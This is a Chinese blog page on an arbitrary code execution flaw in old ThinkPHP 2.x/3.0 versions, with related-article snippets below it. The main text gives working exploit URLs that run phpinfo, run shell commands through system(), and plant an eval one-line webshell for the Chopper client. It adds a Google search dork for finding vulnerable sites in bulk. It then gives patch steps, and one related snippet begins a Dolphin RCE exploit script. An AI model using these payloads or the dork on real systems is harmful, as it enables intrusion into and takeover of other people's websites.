海豚php框架漏洞,Thinkphp框架任意代码执行漏洞利用及修复

最新推荐文章于 2024-03-06 10:14:43 发布
最新推荐文章于 2024-03-06 10:14:43 发布
阅读量974 收藏
点赞数
文章标签: 海豚php框架漏洞

ThinkPHP是一个开源的PHP框架, 是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循 Apache2开源协议发布。早期的思想架构来源于Struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结 构和MVC模式,融合了Struts的Action和Dao思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式, 封装了CURD和一些常用操作,单一入口模式等,在模版引擎、缓存机制、认证机制和扩展性方面均有独特的表现.

最近thinkphp框架爆出了一个任意代码执行漏洞,其威胁程序相当的高,漏洞利用方法如下:

index.php/module/aciton/param1/${@print(THINK_VERSION)}

index.php/module/aciton/param1/${@function_all()}

其中function_all代表任何函数,比如:

index.php/module/aciton/param1/${@phpinfo()}

获取服务器的系统配置信息等。

index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

列出网站文件列表

index.php/module/action/param1/{${eval($_POST[s])}}

直接执行一句话代码,用菜刀直接连接.

有时候连接不上的话需要修改一下后面的一句话用print()函数打印出来,如下:

index.php/module/action/param1/$%7B@print(eval($_POST[c]))%7D

黑阔可以直接通过google批量搜索关键字:thinkphp intitle:系统发生错误 来获取更多使用thinkphp框架的网站列表。可见其危害性相当的大。

thinkphp框架执行任意代码漏洞修复方法:

用户可下载官方发布的补丁:http://www.nxadmin.com/tools/ThinkPHP_20120323_security_patch.zip 修正方法:

首先解压缩安全补丁文件。

2.1和2.2版本

替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Think/Util/目录下的同名文件

3.0版本

替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Core/目录下面的同名文件

替换补丁包中的CheckRouteBehavior.class.php 文件到 ThinkPHP/Lib/Behavior/目录下面的同名文件

分享到:

更多

zetachow晓代码mkq
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DolphinPHP(海豚PHP) 1.4.5
05-01
DolphinPHP(海豚PHP)是一个基于ThinkPHP5.0开发的开源PHP快速开发框架,秉承极简、极速、极致的开发理念,为开发集成了基于数据-角色的权限管理机制,集成多种灵活快速构建工具,可方便快速扩展的模块、插件、钩子、数据包,统一了模块、插件、钩子、数据包之间的版本和依赖关系,进一步降低了代码和数据的沉余,以方便开发者快速构建自己的应用。DolphinPHP(海豚PHP) 1.4.5 更新日志:2020-02-11修复一处文件上传漏洞,强烈建议升级到此版本。
ThinkPHP漏洞总结(利用)
热门推荐
yangbz123的博客
04-26 1万+
ThinkPHP介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ...
php常见的45个漏洞及解决方案
qqrrjj2011的博客
03-06 1183
php常见45个漏洞及解决方案
Thinkphp常见漏洞总结
weixin_46622976的博客
07-12 4402
ThinkPHP漏洞整理
网络安全---渗透测试---框架漏洞-ThinkPHP5.0、Struts2
weixin_52796034的博客
11-05 585
反弹shell(Reverse Shell)是一种计算机安全和网络攻击技术,通常被用于与远程目标系统建立命令行交互式连接。这个连接允许攻击者在远程系统上执行命令,获取系统访问权限,以及进行横向移动和数据操作。反弹shell的工作方式如下:攻击者和目标系统之间建立连接:通常,攻击者首先在目标系统上部署一个恶意程序(例如Trojan或后门),该程序会与攻击者的控制服务器建立连接。目标系统反弹连接:一旦恶意程序在目标系统上执行,它会尝试与攻击者的控制服务器建立连接。
漏洞复现】DophinPHP后台getshell
失心少年
12-16 762
DolphinPHP海豚PHP)是一个基于ThinkPHP5.1.41LTS开发的一套开源PHP快速开发框架,DolphinPHP秉承极简、极速、极致的开发理念,为开发集成了基于数据-角色的权限管理机制,集成多种灵活快速构建工具,可方便快速扩展的模块、插件、钩子、数据包。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!
海豚php框架漏洞,Dolphin 7.3.2 认证绕过与命令执行漏洞
weixin_42401025的博客
03-17 874
#!/usr/bin/env python# -*- coding: utf-8 -*-'''Software : Dolphin <= 7.3.2 Auth bypass / RCE exploitVendor : www.boonex.comAuthor : Ahmed sultan (0x4148)Home : 0x4148.com | https://www.linkedin.com...
以DolphinPHP为例的白盒审计分析
hackzkaq的博客
05-19 400
零基础学黑客,搜索公众号:白帽子左一 DolphinPHP 1.简介 DolphinPHP海豚PHP)是一个基于ThinkPHP5.1.41LTS开发的一套开源PHP快速开发框架,DolphinPHP秉承极简、极速、极致的开发理念,为开发集成了基于数据-角色的权限管理机制,集成多种灵活快速构建工具,可方便快速扩展的模块、插件、钩子、数据包。 统一了模块、插件、钩子、数据包之间的版本和依赖关系,进一步降低了代码和数据的冗余,以方便开发者快速构建自己的应用。 官网地址下载:http://www.dolphi
海豚php有没有漏洞,Dolphin 7.1.2 SQL注入漏洞
weixin_36030121的博客
03-23 622
发布日期:2013-06-12更新日期:2013-06-27受影响系统:boonex Dolphin <= 7.1.2描述:--------------------------------------------------------------------------------CVE(CAN) ID: CVE-2013-3638Dolphin是社区网站构建软件平台。Dolphin没有充...
DolphinPHP ≤ 1.4.3文件上传漏洞分析
Hananana46的博客
02-04 2670
DolphinPHP(海豚PHP)是一个基于ThinkPHP5.1.39LTS开发的一套开源PHP。在DolphinPHP ≤ 1.4.3版本中,jcrop函数都没有对上传的文件进行后缀和文件类型校验导致可以上传任意文件。
2015中国网络安全大赛:框架漏洞真题
forbidd3n,keep going
11-09 5792
看题分析:打开网址,是一个后台登录,结合框架漏洞,想到了struts漏洞。 0x00 收集信息 发现网站不是struts架构,于是截包看了下数据,有所发现: 明显是一个ThinkPHP2.1的产品,直接搜索ThinkPHP2.1+漏洞,找到几篇任意代码执行漏洞。 0x01 任意代码执行漏洞 根据说明(原理网上比较多,我这里就不陈述了,别人分析更好),构造利用URL www.x
DolphinPHP 1.4.2(_1.4.5)后台 GetShell1
08-03
废话少说本地搭建完成后,先进后台上传图,进抓包可以看到访问路径为 /admin/attachment/upload/dir/images/module/admi
DolphinPHP(海豚PHP)快速开发框架v1.4.2
07-24
DophinPHP海豚PHP)是一个基于ThinkPHP5.0.3开发的开源PHP快速开发框架,秉承极简、极速、极致的开发理念,为开发集成了基于数据-角色的权限管理机制,集成多种灵活快速构建工具,可方便快速扩展的模块、插件、钩子、数据包。统一了模块、插件、钩子、数据包之间的版本和依赖关系,进一步降低了代码和数据的沉余,以方便开发者快速构建自己的应用。 您可以轻松的应对复杂多变的表单、数据列表。
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
10-25
主要介绍了ThinkPHP框架任意代码执行漏洞的利用及其修复方法,该漏洞修复对于广大使用ThinkPHP的开发人员来说尤为重要!需要的朋友可以参考下
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
10-25
主要介绍了对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析,对于网站安全十分重要!需要的朋友可以参考下
springboot(酒店管理系统)
04-25
开发语言:Java JDK版本:JDK1.8(或11) 服务器:tomcat 数据库:mysql 5.6/5.7(或8.0) 数据库工具:Navicat 开发软件:idea 依赖管理包:Maven 代码+数据库保证完整可用,可提供远程调试并指导运行服务(额外付费)~ 如果对系统的中的某些部分感到不合适可提供修改服务,比如题目、界面、功能等等... 声明: 1.项目已经调试过,完美运行 2.需要远程帮忙部署项目,需要额外付费 3.本项目有演示视频,如果需要观看,请联系我 4.调试过程中可帮忙安装IDEA,eclipse,MySQL,JDK,Tomcat等软件 重点: 需要其他Java源码联系我,更多源码任你选,你想要的源码我都有! 需要加v19306446185
BP神经网络matlab实例.doc
最新发布
04-25
数学模型算法
海豚动态参数
06-02
海豚Scheduler同样支持动态参数,可以在任务配置中通过`${}`语法引用动态参数,例如: ``` { "name": "my_job", "description": "My Job", "cron": "* * * * *", "parameters": [ { "name": "date", "description": "The date parameter", "required": true }, { "name": "mode", "description": "The mode parameter", "required": false, "default": "incremental" } ], "task": { "name": "my_task", "description": "My Task", "type": "command", "command": "echo ${date} ${mode}" } } ``` 在任务执行时,可以通过在命令行中传递参数来替换动态参数的值,例如: ``` dolphind schedule my_job -p "date=20200101" -p "mode=full" ``` 这样,海豚Scheduler会将`${date}`和`${mode}`替换为对应的值,即`20200101`和`full`,然后执行`echo 20200101 full`命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值